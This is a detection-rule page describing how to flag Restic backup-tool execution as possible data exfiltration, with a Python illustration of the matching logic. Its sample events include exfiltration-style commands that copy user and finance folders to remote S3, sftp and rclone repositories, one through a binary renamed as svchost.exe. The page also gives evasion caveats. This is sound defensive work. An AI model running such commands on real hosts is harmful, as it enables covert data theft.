PUA - Restic Backup Tool Execution

Sigma Rules

Summary
This detection rule identifies execution of the Restic backup tool, a legitimate open-source utility that threat actors can repurpose for data exfiltration. Restic writes backups to a repository that can live on remote storage, including cloud object storage, so an attacker who runs it on a compromised host can copy sensitive data out of the organization under the cover of ordinary backup traffic. Where Restic is not sanctioned for use in the enterprise, its presence is a strong indicator of potentially malicious activity, in particular unauthorized data exfiltration. The rule keys on process-creation events and on the command-line arguments associated with the tool, such as the 'init' subcommand and the options that select a remote repository, to judge whether the execution is part of a broader attack. It targets specific command-line patterns that suggest misuse while allowing for typical legitimate invocations, to keep false positives low.
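The following is an added illustration of the detection logic the summary describes, written for this page; it is not the rule's own YAML and not code from the Restic project. The image name, OriginalFileName match, the 'init'/'backup' subcommands and the set of remote repository URL schemes are assumptions about what such a rule keys on (the scheme prefixes themselves are the ones Restic documents for its remote backends), and the process-creation events are constructed, not captured from a real host.

```python
"""Toy evaluation of a Restic-execution detection over process-creation events.

Added example for this page; not the Sigma rule itself. Matching fields,
subcommands and scheme list are assumptions about the rule's selection.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Repository URL schemes Restic uses for remote backends. A repository given
# as a plain local path (e.g. D:\backups\repo) does not start with any of these.
REMOTE_SCHEMES = ("s3:", "sftp:", "rest:", "azure:", "gs:", "b2:", "swift:", "rclone:")


@dataclass
class ProcessEvent:
    """Subset of a Windows process-creation event (Sysmon EID 1 style)."""
    image: str
    original_file_name: str
    command_line: str


def is_restic(ev: ProcessEvent) -> bool:
    """Match on the path name or on the PE's OriginalFileName, so a renamed
    restic.exe is still caught (assumed selection, see lead-in)."""
    return (ev.image.lower().endswith("\\restic.exe")
            or ev.original_file_name.lower() == "restic.exe")


def tokenize(command_line: str) -> List[str]:
    """Split a Windows command line: non-POSIX mode keeps backslashes literal,
    quoted paths stay whole, and '#' is not treated as a comment."""
    lex = shlex.shlex(command_line, posix=False)
    lex.whitespace_split = True
    lex.commenters = ""
    return [tok.strip('"') for tok in lex]


def repository_target(tokens: List[str]) -> Optional[str]:
    """Return the repository named via -r/--repo, or None if absent."""
    for i, tok in enumerate(tokens):
        if tok in ("-r", "--repo") and i + 1 < len(tokens):
            return tokens[i + 1]
        if tok.startswith("--repo="):
            return tok.split("=", 1)[1]
    return None


def evaluate(ev: ProcessEvent) -> Optional[str]:
    """Return a short reason string when the event should alert, else None.

    Alert on 'init' (a new repository is being created) and on 'backup'
    aimed at a remote scheme; a backup to a local path is treated as the
    ordinary, sanctioned use the summary wants to leave alone (assumption).
    """
    if not is_restic(ev):
        return None
    tokens = tokenize(ev.command_line)
    subcommands = {t.lower() for t in tokens[1:]}
    repo = repository_target(tokens)
    remote = repo is not None and repo.lower().startswith(REMOTE_SCHEMES)
    if "init" in subcommands:
        return f"restic init (new repository: {repo or 'unspecified'})"
    if "backup" in subcommands and remote:
        return f"restic backup to remote repository {repo}"
    return None


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Tools\\restic.exe", "restic.exe",
                 "restic.exe -r s3:s3.amazonaws.com/exfil-bucket backup C:\\Users\\alice\\Documents"),
    ProcessEvent("C:\\Program Files\\restic\\restic.exe", "restic.exe",
                 '"C:\\Program Files\\restic\\restic.exe" --repo=sftp:backup@203.0.113.5:/srv/repo init'),
    ProcessEvent("C:\\Program Files\\restic\\restic.exe", "restic.exe",
                 "restic.exe -r D:\\backups\\repo backup C:\\Data"),
    # Renamed binary: the path hides it, OriginalFileName does not.
    ProcessEvent("C:\\Windows\\Temp\\svchost.exe", "restic.exe",
                 "svchost.exe -r rclone:remote:finance backup C:\\Finance"),
    ProcessEvent("C:\\Windows\\System32\\notepad.exe", "NOTEPAD.EXE",
                 "notepad.exe C:\\notes.txt"),
    ProcessEvent("C:\\Tools\\restic.exe", "restic.exe",
                 "restic.exe -r D:\\backups\\repo snapshots"),
]


def scan(events: List[ProcessEvent] = SAMPLE_EVENTS) -> List[Optional[str]]:
    """Evaluate every event; the result aligns index-for-index with the input."""
    return [evaluate(ev) for ev in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, scan()):
        print(f"{ev.image:45} -> {verdict or 'no alert'}")
```

Two caveats worth keeping in mind when tuning the real rule: Restic also reads the repository from the RESTIC_REPOSITORY environment variable, so an attacker who sets that and omits -r leaves no scheme on the command line, and a renamed binary is only caught if the telemetry carries OriginalFileName (or a file hash) alongside the image path.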
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
Created: 2025-10-17